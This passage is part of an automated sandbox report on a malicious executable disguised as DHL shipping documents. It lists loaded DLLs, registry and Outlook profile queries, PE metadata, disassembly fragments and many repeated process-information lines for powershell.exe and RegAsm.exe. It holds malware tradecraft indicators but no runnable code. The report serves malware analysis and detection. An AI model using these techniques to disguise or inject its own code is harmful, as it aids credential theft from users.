                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: Documents Of DHL -BL- AWB- 8976453410.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Documents Of DHL -BL- AWB- 8976453410.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Documents Of DHL -BL- AWB- 8976453410.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.ni.pdbRSDS source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.CSharp.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Windows.Forms.pdbP source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Windows.Forms.ni.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.ni.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.pdb0 source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.ni.pdbRSDS source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Core.pdbH source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Core.ni.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Windows.Forms.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.pdb@ source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Dynamic.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Drawing.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: mscorlib.ni.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Core.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: Microsoft.VisualBasic.pdbh source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.ni.pdb source: WERF70B.tmp.dmp.8.dr
                      Source: Binary string: System.Core.ni.pdbRSDS source: WERF70B.tmp.dmp.8.dr
                      Source: Documents Of DHL -BL- AWB- 8976453410.exeStatic PE information: 0xF4D2168A [Sat Feb 27 10:57:14 2100 UTC]
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeCode function: 0_2_00007FFAACCD47DD pushfd ; ret 0_2_00007FFAACCD4AA1
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeCode function: 0_2_00007FFAACCD755D push ebx; iretd 0_2_00007FFAACCD756A
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeCode function: 0_2_00007FFAACCD6132 push ds; ret 0_2_00007FFAACCD620F
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeCode function: 0_2_00007FFAACCD00BD pushad ; iretd 0_2_00007FFAACCD00C1
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeCode function: 0_2_00007FFAACDE0261 push esp; retf 4810h0_2_00007FFAACDE0552
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_015EC1B7 push esp; ret 4_2_015EC1B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_015EC2C1 push esp; ret 4_2_015EC2C2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_015E0C53 push ebx; retf 4_2_015E0C52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_015E0C45 push ebx; retf 4_2_015E0C52
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_015E0C6D push edi; retf 4_2_015E0C7A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D56442 pushfd ; retf 4_2_06D56449
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D55100 push eax; ret 4_2_06D55101
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4_2_06D6F28B push ds; iretd 4_2_06D6F28E
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeFile created: \documents of dhl -bl- awb- 8976453410.exe
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeFile created: \documents of dhl -bl- awb- 8976453410.exe
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeFile created: \documents of dhl -bl- awb- 8976453410.exe
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeFile created: \documents of dhl -bl- awb- 8976453410.exe
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeFile created: \documents of dhl -bl- awb- 8976453410.exeJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeFile created: \documents of dhl -bl- awb- 8976453410.exeJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeFile created: \documents of dhl -bl- awb- 8976453410.exeJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Documents Of DHL -BL- AWB- 8976453410.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
